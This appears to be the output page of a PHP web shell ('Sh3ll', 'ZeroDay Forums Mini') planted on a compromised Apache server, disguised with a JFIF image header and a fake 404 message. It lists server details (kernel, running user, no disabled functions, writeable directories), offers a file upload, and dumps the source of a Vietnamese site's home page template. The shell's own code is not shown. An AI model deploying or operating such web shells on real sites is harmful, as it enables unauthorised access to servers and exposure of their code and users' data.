JFIF ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/luckymerchan/code/home/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/luckymerchan/code/home/index.php
<?php
$CORE->title_page = 'Home';
$q_block = $DB->query("SELECT a.* FROM tb_block a LEFT JOIN tb_block_page b ON a.block_id=b.block_id WHERE b.menus_id=1 ORDER BY a.block_pos ASC, a.block_id ASC");
$txt_list = '';
while ($r_block = $DB->fetch_row($q_block)){
    $arr_block['id'] = $r_block['block_id'];
    $arr_block['name'] = $r_block['block_title'];
    if($r_block['block_type']==1){
        $arr_block['content'] = htmlspecialchars_decode(html_entity_decode($r_block['block_detail']));

    }else{
        $arr_block['content'] = '';
    }
    $list_block[] = $arr_block;
}
include 'include/block/header_website.php';
include 'include/block/menu_website.php';
?>
<!-- Header-->
<header class="py-2">
    <div class="container px-5 pb-5">
        <div class="row gx-5 align-items-center">
            <div class="col-md-6">
                <!-- Header text content-->
                <?php echo html_entity_decode($list_block[0]['content']);?>
                <?php
                if(!isset($ob_user->user_id) or $ob_user->user_id==0){
                ?>
                <div class="text-center text-xxl-start">
                <div class="d-grid gap-3 d-sm-flex justify-content-sm-center justify-content-xxl-start mb-3">
                    <a class="btn btn-primary btn-lg px-5 py-3 me-sm-3 fs-6 fw-bolder" href="/login.html">Đăng nhập</a>
                    <a class="btn btn-outline-dark btn-lg px-5 py-3 fs-6 fw-bolder" href="/register.html">Đăng ký</a>
                </div>
                </div>
                <?php }else{ ?>
                    <div class="text-center text-xxl-start">
                        <div class="d-grid gap-3 d-sm-flex justify-content-sm-center justify-content-xxl-start mb-3">
                            <a class="btn btn-primary btn-lg px-5 py-3 me-sm-3 fs-6 fw-bolder" href="/thong-ke/">Lịch sử số lọc</a>
                            <a class="btn btn-outline-dark btn-lg px-5 py-3 fs-6 fw-bolder" href="/huong-dan/">Hướng dẫn</a>
                        </div>
                    </div>
                        <?php
                }
                ?>
            </div>
            <div class="col-md-6">
                <!-- Header profile picture-->
                <?php echo html_entity_decode($list_block[1]['content']);?>
            </div>
        </div>
    </div>
</header>
<!-- About Section-->
<?php echo html_entity_decode($list_block[2]['content']);?>
<?php
include 'include/block/footer_website.php';
?>

ZeroDay Forums Mini